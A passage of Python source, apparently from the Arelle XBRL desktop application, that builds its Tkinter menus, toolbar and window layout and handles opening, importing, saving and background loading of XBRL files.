(_("Open File..."), self.fileOpen, "Ctrl+O", "<Control-o>"),
(_("Open Web..."), self.webOpen, "Shift+Alt+O", "<Shift-Alt-o>"),
(_("Import File..."), self.importFileOpen, None, None),
(_("Import Web..."), self.importWebOpen, None, None),
(_("Reopen"), self.fileReopen, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Open", None, None),
(_("Save"), self.fileSaveExistingFile, "Ctrl+S", "<Control-s>"),
(_("Save As..."), self.fileSave, None, None),
(_("Save DTS Package"), self.saveDTSpackage, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Save", None, None),
(_("Close"), self.fileClose, "Ctrl+W", "<Control-w>"),
(None, None, None, None),
(_("Quit"), self.quit, "Ctrl+Q", "<Control-q>"),
#(_("Restart"), self.restart, None, None),
(None, None, None, None),
("",None,None,None) # position for file history
):
if label is None:
self.fileMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, self.fileMenu)
self.fileMenuLength += 1
else:
self.fileMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
self.fileMenuLength += 1
self.loadFileMenuHistory()
self.menubar.add_cascade(label=_("File"), menu=self.fileMenu, underline=0)
toolsMenu = Menu(self.menubar, tearoff=0)
validateMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Validation"), menu=validateMenu, underline=0)
validateMenu.add_command(label=_("Validate"), underline=0, command=self.validate)
self.modelManager.validateDisclosureSystem = self.config.setdefault("validateDisclosureSystem",False)
self.validateDisclosureSystem = BooleanVar(value=self.modelManager.validateDisclosureSystem)
self.validateDisclosureSystem.trace("w", self.setValidateDisclosureSystem)
validateMenu.add_checkbutton(label=_("Disclosure system checks"), underline=0, variable=self.validateDisclosureSystem, onvalue=True, offvalue=False)
validateMenu.add_command(label=_("Select disclosure system..."), underline=0, command=self.selectDisclosureSystem)
self.modelManager.validateCalcLB = self.config.setdefault("validateCalcLB",False)
self.validateCalcLB = BooleanVar(value=self.modelManager.validateCalcLB)
self.validateCalcLB.trace("w", self.setValidateCalcLB)
validateMenu.add_checkbutton(label=_("Calc Linkbase checks"), underline=0, variable=self.validateCalcLB, onvalue=True, offvalue=False)
self.modelManager.validateInferDecimals = self.config.setdefault("validateInferDecimals",True)
self.validateInferDecimals = BooleanVar(value=self.modelManager.validateInferDecimals)
self.validateInferDecimals.trace("w", self.setValidateInferDecimals)
validateMenu.add_checkbutton(label=_("Infer Decimals in calculations"), underline=0, variable=self.validateInferDecimals, onvalue=True, offvalue=False)
self.modelManager.validateDedupCalcs = self.config.setdefault("validateDedupCalcs",False)
self.validateDedupCalcs = BooleanVar(value=self.modelManager.validateDedupCalcs)
self.validateDedupCalcs.trace("w", self.setValidateDedupCalcs)
validateMenu.add_checkbutton(label=_("De-duplicate calculations"), underline=0, variable=self.validateDedupCalcs, onvalue=True, offvalue=False)
self.modelManager.validateUtr = self.config.setdefault("validateUtr",True)
self.validateUtr = BooleanVar(value=self.modelManager.validateUtr)
self.validateUtr.trace("w", self.setValidateUtr)
validateMenu.add_checkbutton(label=_("Unit Type Registry validation"), underline=0, variable=self.validateUtr, onvalue=True, offvalue=False)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Validation"):
pluginMenuExtender(self, validateMenu)
formulaMenu = Menu(self.menubar, tearoff=0)
formulaMenu.add_command(label=_("Parameters..."), underline=0, command=self.formulaParametersDialog)
toolsMenu.add_cascade(label=_("Formula"), menu=formulaMenu, underline=0)
self.modelManager.formulaOptions = FormulaOptions(self.config.get("formulaParameters"))
toolsMenu.add_command(label=_("Compare DTSes..."), underline=0, command=self.compareDTSes)
cacheMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu.add_command(label=_("Options..."), underline=0, command=self.rssWatchOptionsDialog)
rssWatchMenu.add_command(label=_("Start"), underline=0, command=lambda: self.rssWatchControl(start=True))
rssWatchMenu.add_command(label=_("Stop"), underline=0, command=lambda: self.rssWatchControl(stop=True))
toolsMenu.add_cascade(label=_("RSS Watch"), menu=rssWatchMenu, underline=0)
self.modelManager.rssWatchOptions = self.config.setdefault("rssWatchOptions", {})
toolsMenu.add_cascade(label=_("Internet"), menu=cacheMenu, underline=0)
self.webCache.workOffline = self.config.setdefault("workOffline",False)
self.workOffline = BooleanVar(value=self.webCache.workOffline)
self.workOffline.trace("w", self.setWorkOffline)
cacheMenu.add_checkbutton(label=_("Work offline"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
self.webCache.noCertificateCheck = self.config.setdefault("noCertificateCheck",False) # resets proxy handler stack if true
self.noCertificateCheck = BooleanVar(value=self.webCache.noCertificateCheck)
self.noCertificateCheck.trace("w", self.setNoCertificateCheck)
cacheMenu.add_checkbutton(label=_("No certificate check"), underline=0, variable=self.noCertificateCheck, onvalue=True, offvalue=False)
'''
self.webCache.recheck = self.config.setdefault("webRecheck",False)
self.webRecheck = BooleanVar(value=self.webCache.webRecheck)
self.webRecheck.trace("w", self.setWebRecheck)
cacheMenu.add_checkbutton(label=_("Recheck file dates weekly"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
self.webCache.notify = self.config.setdefault("",False)
self.downloadNotify = BooleanVar(value=self.webCache.retrievalNotify)
self.downloadNotify.trace("w", self.setRetrievalNotify)
cacheMenu.add_checkbutton(label=_("Notify file downloads"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
'''
cacheMenu.add_command(label=_("Clear cache"), underline=0, command=self.confirmClearWebCache)
cacheMenu.add_command(label=_("Manage cache"), underline=0, command=self.manageWebCache)
cacheMenu.add_command(label=_("Proxy Server"), underline=0, command=self.setupProxy)
logmsgMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Messages log"), menu=logmsgMenu, underline=0)
logmsgMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logmsgMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
self.modelManager.collectProfileStats = self.config.setdefault("collectProfileStats",False)
self.collectProfileStats = BooleanVar(value=self.modelManager.collectProfileStats)
self.collectProfileStats.trace("w", self.setCollectProfileStats)
logmsgMenu.add_checkbutton(label=_("Collect profile stats"), underline=0, variable=self.collectProfileStats, onvalue=True, offvalue=False)
logmsgMenu.add_command(label=_("Log profile stats"), underline=0, command=self.showProfileStats)
logmsgMenu.add_command(label=_("Clear profile stats"), underline=0, command=self.clearProfileStats)
self.showDebugMessages = BooleanVar(value=self.config.setdefault("showDebugMessages",False))
self.showDebugMessages.trace("w", self.setShowDebugMessages)
logmsgMenu.add_checkbutton(label=_("Show debug messages"), underline=0, variable=self.showDebugMessages, onvalue=True, offvalue=False)
toolsMenu.add_command(label=_("Language..."), underline=0, command=lambda: DialogLanguage.askLanguage(self))
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Tools"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Tools"), menu=toolsMenu, underline=0)
# view menu only if any plug-in additions provided
if any (pluginClassMethods("CntlrWinMain.Menu.View")):
viewMenu = Menu(self.menubar, tearoff=0)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.View"):
pluginMenuExtender(self, viewMenu)
self.menubar.add_cascade(label=_("View"), menu=viewMenu, underline=0)
helpMenu = Menu(self.menubar, tearoff=0)
for label, command, shortcut_text, shortcut in (
(_("Check for updates"), lambda: Updater.checkForUpdates(self), None, None),
(_("Manage plug-ins"), lambda: DialogPluginManager.dialogPluginManager(self), None, None),
(_("Manage packages"), lambda: DialogPackageManager.dialogPackageManager(self), None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Upper", None, None),
(None, None, None, None),
(_("About..."), self.helpAbout, None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Lower", None, None),
):
if label is None:
helpMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, helpMenu)
else:
helpMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Help"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Help"), menu=helpMenu, underline=0)
windowFrame = Frame(self.parent)
self.statusbar = Label(windowFrame, text=_("Ready..."), anchor=W)
self.statusbarTimerId = self.statusbar.after(5000, self.uiClearStatusTimerEvent)
self.statusbar.grid(row=2, column=0, columnspan=2, sticky=EW)
#self.balloon = tkinter.tix.Balloon(windowFrame, statusbar=self.statusbar)
self.toolbar_images = []
toolbar = Frame(windowFrame)
menubarColumn = 0
self.validateTooltipText = StringVar()
for image, command, toolTip, statusMsg in (
#("images/toolbarNewFile.gif", self.fileNew),
("toolbarOpenFile.gif", self.fileOpen, _("Open local file"), _("Open by choosing a local XBRL file, testcase, or archive file")),
("toolbarOpenWeb.gif", self.webOpen, _("Open web file"), _("Enter an http:// URL of an XBRL file or testcase")),
("toolbarReopen.gif", self.fileReopen, _("Reopen"), _("Reopen last opened XBRL file or testcase(s)")),
("toolbarSaveFile.gif", self.fileSaveExistingFile, _("Save file"), _("Saves currently selected local XBRL file")),
("toolbarClose.gif", self.fileClose, _("Close"), _("Closes currently selected instance/DTS or testcase(s)")),
(None,None,None,None),
("toolbarFindMenu.gif", self.find, _("Find"), _("Find dialog for scope and method of searching")),
(None,None,None,None),
("toolbarValidate.gif", self.validate, self.validateTooltipText, _("Validate currently selected DTS or testcase(s)")),
("toolbarCompare.gif", self.compareDTSes, _("Compare DTSes"), _("compare two DTSes")),
(None,None,None,None),
("toolbarLogClear.gif", self.logClear, _("Messages Log | Clear"), _("Clears the messages log")),
#(Combobox(toolbar, textvariable=self.findVar, values=self.findValues,
# ), self.logClear, _("Find options"), _("Select of find options")),
):
if command is None:
tbControl = Separator(toolbar, orient=VERTICAL)
tbControl.grid(row=0, column=menubarColumn, padx=6)
elif isinstance(image, Combobox):
tbControl = image
tbControl.grid(row=0, column=menubarColumn)
else:
image = os.path.join(self.imagesDir, image)
try:
image = PhotoImage(file=image)
self.toolbar_images.append(image)
tbControl = Button(toolbar, image=image, command=command, style="Toolbutton", padding=toolbarButtonPadding)
tbControl.grid(row=0, column=menubarColumn)
except TclError as err:
print(err)
if isinstance(toolTip,StringVar):
ToolTip(tbControl, textvariable=toolTip, wraplength=240)
else:
ToolTip(tbControl, text=toolTip)
menubarColumn += 1
for toolbarExtender in pluginClassMethods("CntlrWinMain.Toolbar"):
toolbarExtender(self, toolbar)
toolbar.grid(row=0, column=0, sticky=(N, W))
paneWinTopBtm = PanedWindow(windowFrame, orient=VERTICAL)
paneWinTopBtm.grid(row=1, column=0, sticky=(N, S, E, W))
paneWinLeftRt = tkinter.PanedWindow(paneWinTopBtm, orient=HORIZONTAL)
paneWinLeftRt.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(paneWinLeftRt)
self.tabWinTopLeft = Notebook(paneWinLeftRt, width=250, height=300)
self.tabWinTopLeft.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.add(self.tabWinTopLeft)
self.tabWinTopRt = Notebook(paneWinLeftRt)
self.tabWinTopRt.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinTopRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinLeftRt.add(self.tabWinTopRt)
self.tabWinBtm = Notebook(paneWinTopBtm)
self.tabWinBtm.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinBtm.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(self.tabWinBtm)
from arelle import ViewWinList
self.logView = ViewWinList.ViewList(None, self.tabWinBtm, _("messages"), True)
self.startLogging(logHandler=WinMainLogHandler(self)) # start logger
logViewMenu = self.logView.contextMenu(contextMenuClick=self.contextMenuClick)
logViewMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logViewMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
if self.hasClipboard:
logViewMenu.add_command(label=_("Copy to clipboard"), underline=0, command=lambda: self.logView.copyToClipboard(cntlr=self))
windowFrame.grid(row=0, column=0, sticky=(N,S,E,W))
windowFrame.columnconfigure(0, weight=999)
windowFrame.columnconfigure(1, weight=1)
windowFrame.rowconfigure(0, weight=1)
windowFrame.rowconfigure(1, weight=999)
windowFrame.rowconfigure(2, weight=1)
paneWinTopBtm.columnconfigure(0, weight=1)
paneWinTopBtm.rowconfigure(0, weight=1)
paneWinLeftRt.columnconfigure(0, weight=1)
paneWinLeftRt.rowconfigure(0, weight=1)
self.tabWinTopLeft.columnconfigure(0, weight=1)
self.tabWinTopLeft.rowconfigure(0, weight=1)
self.tabWinTopRt.columnconfigure(0, weight=1)
self.tabWinTopRt.rowconfigure(0, weight=1)
self.tabWinBtm.columnconfigure(0, weight=1)
self.tabWinBtm.rowconfigure(0, weight=1)
window = self.parent.winfo_toplevel()
window.columnconfigure(0, weight=1)
window.rowconfigure(0, weight=1)
priorState = self.config.get('windowState')
screenW = self.parent.winfo_screenwidth() - 16 # allow for window edge
screenH = self.parent.winfo_screenheight() - 64 # allow for caption and menus
if priorState == "zoomed":
self.parent.state("zoomed")
w = screenW
h = screenH
else:
priorGeometry = re.match("(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)",self.config.get('windowGeometry'))
if priorGeometry and priorGeometry.lastindex >= 4:
try:
w = int(priorGeometry.group(1))
h = int(priorGeometry.group(2))
x = int(priorGeometry.group(3))
y = int(priorGeometry.group(4))
if x + w > screenW:
if w < screenW:
x = screenW - w
else:
x = 0
w = screenW
elif x < 0:
x = 0
if w > screenW:
w = screenW
if y + h > screenH:
if y < screenH:
y = screenH - h
else:
y = 0
h = screenH
elif y < 0:
y = 0
if h > screenH:
h = screenH
self.parent.geometry("{0}x{1}+{2}+{3}".format(w,h,x,y))
except:
pass
# set top/btm divider
topLeftW, topLeftH = self.config.get('tabWinTopLeftSize',(250,300))
if 10 < topLeftW < w - 60:
self.tabWinTopLeft.config(width=topLeftW)
if 10 < topLeftH < h - 60:
self.tabWinTopLeft.config(height=topLeftH)
self.parent.title(_("arelle - Unnamed"))
self.logFile = None
self.uiThreadQueue = queue.Queue() # background processes communicate with ui thread
self.uiThreadChecker(self.statusbar) # start background queue
self.modelManager.loadCustomTransforms() # load if custom transforms not loaded
if not self.modelManager.disclosureSystem.select(self.config.setdefault("disclosureSystem", None)):
self.validateDisclosureSystem.set(False)
self.modelManager.validateDisclosureSystem = False
# load argv overrides for modelManager options
lastArg = None
for arg in sys.argv:
if not arg: continue
if lastArg == "--skipLoading": # skip loading matching files (list of unix patterns)
self.modelManager.skipLoading = re.compile('|'.join(fnmatch.translate(f) for f in arg.split('|')))
elif arg == "--skipDTS": # skip DTS loading, discovery, etc
self.modelManager.skipDTS = True
lastArg = arg
self.setValidateTooltipText()
def onTabChanged(self, event, *args):
try:
widgetIndex = event.widget.index("current")
tabId = event.widget.tabs()[widgetIndex]
for widget in event.widget.winfo_children():
if str(widget) == tabId:
self.currentView = widget.view
break
except (AttributeError, TypeError, TclError):
pass
def loadFileMenuHistory(self):
self.fileMenu.delete(self.fileMenuLength, self.fileMenuLength + 2)
fileHistory = self.config.setdefault("fileHistory", [])
self.recentFilesMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(fileHistory), 10 ) ):
self.recentFilesMenu.add_command(
label=fileHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["fileHistory"][j]))
self.fileMenu.add_cascade(label=_("Recent files"), menu=self.recentFilesMenu, underline=0)
importHistory = self.config.setdefault("importHistory", [])
self.recentAttachMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(importHistory), 10 ) ):
self.recentAttachMenu.add_command(
label=importHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["importHistory"][j],importToDTS=True))
self.fileMenu.add_cascade(label=_("Recent imports"), menu=self.recentAttachMenu, underline=0)
self.packagesMenu = Menu(self.menubar, tearoff=0)
hasPackages = False
for i, packageInfo in enumerate(sorted(PackageManager.packagesConfig.get("packages", []),
key=lambda packageInfo: (packageInfo.get("name",""),packageInfo.get("version",""))),
start=1):
name = packageInfo.get("name", "package{}".format(i))
version = packageInfo.get("version")
if version:
name = "{} ({})".format(name, version)
URL = packageInfo.get("URL")
if name and URL and packageInfo.get("status") == "enabled":
self.packagesMenu.add_command(
label=name,
command=lambda url=URL: self.fileOpenFile(url))
hasPackages = True
if hasPackages:
self.fileMenu.add_cascade(label=_("Packages"), menu=self.packagesMenu, underline=0)
def onPackageEnablementChanged(self):
self.loadFileMenuHistory()
def fileNew(self, *ignore):
if not self.okayToContinue():
return
self.logClear()
self.dirty = False
self.filename = None
self.data = {}
self.parent.title(_("arelle - Unnamed"));
self.modelManager.load(None);
def getViewAndModelXbrl(self):
view = getattr(self, "currentView", None)
if view:
modelXbrl = None
try:
modelXbrl = view.modelXbrl
return (view, modelXbrl)
except AttributeError:
return (view, None)
return (None, None)
def okayToContinue(self):
view, modelXbrl = self.getViewAndModelXbrl()
documentIsModified = False
if view is not None:
try:
# What follows only exists in ViewWinRenderedGrid
view.updateInstanceFromFactPrototypes()
except AttributeError:
pass
if modelXbrl is not None:
documentIsModified = modelXbrl.isModified()
if not self.dirty and (not documentIsModified):
return True
reply = tkinter.messagebox.askokcancel(
_("arelle - Unsaved Changes"),
_("Are you sure to close the current instance without saving?\n (OK will discard changes.)"),
parent=self.parent)
if reply is None:
return False
else:
return reply
def fileSave(self, event=None, view=None, fileType=None, filenameFromInstance=False, *ignore):
if view is None:
view = getattr(self, "currentView", None)
if view is not None:
filename = None
modelXbrl = None
try:
modelXbrl = view.modelXbrl
except AttributeError:
pass
if filenameFromInstance:
try:
modelXbrl = view.modelXbrl
filename = modelXbrl.modelDocument.filepath
if filename.endswith('.xsd'): # DTS entry point, no instance saved yet!
filename = None
except AttributeError:
pass
if isinstance(view, ViewWinRenderedGrid.ViewRenderedGrid):
initialdir = os.path.dirname(modelXbrl.modelDocument.uri)
if fileType in ("html", "xml", None):
if fileType == "html" and filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("HTML file .html"), "*.html"), (_("HTML file .htm"), "*.htm")],
defaultextension=".html")
elif fileType == "xml" and filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save Table Layout Model"),
initialdir=initialdir,
filetypes=[(_("Layout model file .xml"), "*.xml")],
defaultextension=".xml")
else: # ask file type
if filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save XBRL Instance or HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml"), (_("HTML table .html"), "*.html"), (_("HTML table .htm"), "*.htm")],
defaultextension=".html")
if filename and (filename.endswith(".xbrl") or filename.endswith(".xml")):
view.saveInstance(filename)
return True
if not filename:
return False
try:
ViewFileRenderedGrid.viewRenderedGrid(modelXbrl, filename, lang=self.labelLang, sourceView=view)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif fileType == "xbrl":
return self.uiFileDialog("save",
title=_("arelle - Save Instance"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml")],
defaultextension=".xbrl")
elif isinstance(view, ViewWinTests.ViewTests) and modelXbrl.modelDocument.type in (ModelDocument.Type.TESTCASESINDEX, ModelDocument.Type.TESTCASE):
filename = self.uiFileDialog("save",
title=_("arelle - Save Test Results"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("CSV file"), "*.csv")],
defaultextension=".csv")
if not filename:
return False
try:
ViewFileTests.viewTests(self.modelManager.modelXbrl, filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinTree.ViewTree):
filename = self.uiFileDialog("save",
title=_("arelle - Save {0}").format(view.tabTitle),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("XLSX file"), "*.xlsx"),(_("CSV file"), "*.csv"),(_("HTML file"), "*.html"),(_("XML file"), "*.xml"),(_("JSON file"), "*.json")],
defaultextension=".xlsx")
if not filename:
return False
try:
if isinstance(view, ViewWinRoleTypes.ViewRoleTypes):
ViewFileRoleTypes.viewRoleTypes(modelXbrl, filename, view.tabTitle, view.isArcrole, lang=view.lang)
elif isinstance(view, ViewWinConcepts.ViewConcepts):
ViewFileConcepts.viewConcepts(modelXbrl, filename, labelrole=view.labelrole, lang=view.lang)
elif isinstance(view, ViewWinFactList.ViewFactList):
ViewFileFactList.viewFacts(modelXbrl, filename, labelrole=view.labelrole, lang=view.lang)
else:
ViewFileRelationshipSet.viewRelationshipSet(modelXbrl, filename, view.tabTitle, view.arcrole, labelrole=view.labelrole, lang=view.lang)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinXml.ViewXml) and self.modelManager.modelXbrl.formulaOutputInstance:
filename = self.uiFileDialog("save",
title=_("arelle - Save Formula Result Instance Document"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("XBRL output instance .xml"), "*.xml"), (_("XBRL output instance .xbrl"), "*.xbrl")],
defaultextension=".xml")
if not filename:
return False
try:
from arelle import XmlUtil
with open(filename, "w") as fh:
XmlUtil.writexml(fh, self.modelManager.modelXbrl.formulaOutputInstance.modelDocument.xmlDocument, encoding="utf-8")
self.addToLog(_("[info] Saved formula output instance to {0}").format(filename) )
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True
tkinter.messagebox.showwarning(_("arelle - Save what?"),
_("Nothing has been selected that can be saved. \nPlease select a view pane that can be saved."),
parent=self.parent)
'''
if self.filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save File"),
initialdir=".",
filetypes=[(_("Xbrl file"), "*.x*")],
defaultextension=".xbrl")
if not filename:
return False
self.filename = filename
if not self.filename.endswith(".xbrl"):
self.filename += ".xbrl"
try:
with open(self.filename, "wb") as fh:
pickle.dump(self.data, fh, pickle.HIGHEST_PROTOCOL)
self.dirty = False
self.uiShowStatus(_("Saved {0} items to {1}").format(
len(self.data),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True;
'''
def fileSaveExistingFile(self, event=None, view=None, fileType=None, *ignore):
return self.fileSave(view=view, fileType=fileType, filenameFromInstance=True)
def saveDTSpackage(self):
self.modelManager.saveDTSpackage(allDTSes=True)
def fileOpen(self, *ignore):
if not self.okayToContinue():
return
filename = self.uiFileDialog("open",
title=_("arelle - Open file"),
initialdir=self.config.setdefault("fileOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xbrl")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please open web-accessed files with the second toolbar button, "Open web file", or the File menu, second entry, "Open web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename)
def importFileOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
filename = self.uiFileDialog("open",
title=_("arelle - Import file into opened DTS"),
initialdir=self.config.setdefault("importOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xml")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please import web-accessed files with the File menu, fourth entry, "Import web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename, importToDTS=True)
def updateFileHistory(self, url, importToDTS):
key = "importHistory" if importToDTS else "fileHistory"
fileHistory = self.config.setdefault(key, [])
while fileHistory.count(url) > 0:
fileHistory.remove(url)
if len(fileHistory) > 10:
fileHistory[10:] = []
fileHistory.insert(0, url)
self.config[key] = fileHistory
self.loadFileMenuHistory()
self.saveConfig()
def fileOpenFile(self, filename, importToDTS=False, selectTopView=False):
if filename:
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Open"):
filename = xbrlLoadedMethod(self, filename) # runs in GUI thread, allows mapping filename, mult return filename
filesource = None
# check for archive files
filesource = openFileSource(filename, self,
checkIfXmlIsEis=self.modelManager.disclosureSystem and
self.modelManager.disclosureSystem.validationType == "EFM")
if filesource.isArchive:
if not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
filename = DialogOpenArchive.askArchiveFile(self, filesource)
if filesource.basefile and not isHttpUrl(filesource.basefile):
self.config["fileOpenDir"] = os.path.dirname(filesource.baseurl)
filesource.loadTaxonomyPackageMappings() # if a package, load mappings if not loaded yet
if filename:
if not isinstance(filename, (dict, list)): # json objects
if importToDTS:
if not isHttpUrl(filename):
self.config["importOpenDir"] = os.path.dirname(filename)
else:
if not isHttpUrl(filename):
self.config["fileOpenDir"] = os.path.dirname(filesource.baseurl if filesource.isArchive else filename)
self.updateFileHistory(filename, importToDTS)
elif len(filename) == 1:
self.updateFileHistory(filename[0], importToDTS)
thread = threading.Thread(target=self.backgroundLoadXbrl, args=(filesource,importToDTS,selectTopView), daemon=True).start()
def webOpen(self, *ignore):
if not self.okayToContinue():
return
url = DialogURL.askURL(self.parent, buttonSEC=True, buttonRSS=True)
if url:
self.updateFileHistory(url, False)
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Open"):
url = xbrlLoadedMethod(self, url) # runs in GUI thread, allows mapping url, mult return url
filesource = openFileSource(url,self)
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
url = DialogOpenArchive.askArchiveFile(self, filesource)
self.updateFileHistory(url, False)
thread = threading.Thread(target=self.backgroundLoadXbrl, args=(filesource,False,False), daemon=True).start()
def importWebOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
url = DialogURL.askURL(self.parent, buttonSEC=False, buttonRSS=False)
if url:
self.fileOpenFile(url, importToDTS=True)
def backgroundLoadXbrl(self, filesource, importToDTS, selectTopView):
startedAt = time.time()
try:
if importToDTS:
action = _("imported")
profileStat = "import"
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
ModelDocument.load(modelXbrl, filesource.url, isSupplemental=importToDTS)
modelXbrl.relationshipSets.clear() # relationships have to be re-cached
else:
action = _("loaded")
profileStat = "load"
modelXbrl = self.modelManager.load(filesource, _("views loading"),
checkModifiedTime=isHttpUrl(filesource.url)) # check modified time if GUI-loading from web
except ModelDocument.LoadingException:
self.showStatus(_("Loading terminated, unrecoverable error"), 15000)
return
except Exception as err:
msg = _("Exception loading {0}: {1}, at {2}").format(
filesource.url,
err,
traceback.format_tb(sys.exc_info()[2]))
# not sure if message box can be shown from background thread
# tkinter.messagebox.showwarning(_("Exception loading"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Loading terminated, unrecoverable error"), 15000)
return
if modelXbrl and modelXbrl.modelDocument:
statTime = time.time() - startedAt
modelXbrl.profileStat(profileStat, statTime)
self.addToLog(format_string(self.modelManager.locale,
_("%s in %.2f secs"),
(action, statTime)))
if modelXbrl.hasTableRendering:
self.showStatus(_("Initializing table rendering"))
RenderingEvaluator.init(modelXbrl)
self.showStatus(_("{0}, preparing views").format(action))
self.waitForUiThreadQueue() # force status update
self.uiThreadQueue.put((self.showLoadedXbrl, [modelXbrl, importToDTS, selectTopView]))
else:
self.addToLog(format_string(self.modelManager.locale,
_("not successfully %s in %.2f secs"),
(action, time.time() - startedAt)))
self.showStatus(_("Loading terminated"), 15000)
def showLoadedXbrl(self, modelXbrl, attach, selectTopView=False):
startedAt = time.time()
currentAction = "setting title"
topView = None
self.currentView = None
try:
if attach:
modelXbrl.closeViews()
self.parent.title(_("arelle - {0}").format(
os.path.basename(modelXbrl.modelDocument.uri)))
self.setValidateTooltipText()
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
currentAction = "tree view of tests"
ViewWinTests.viewTests(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
elif modelXbrl.modelDocument.type == ModelDocument.Type.VERSIONINGREPORT:
currentAction = "view of versioning report"
ViewWinVersReport.viewVersReport(modelXbrl, self.tabWinTopRt)
from arelle.ViewWinDiffs import ViewWinDiffs
ViewWinDiffs(modelXbrl, self.tabWinBtm, lang=self.labelLang)
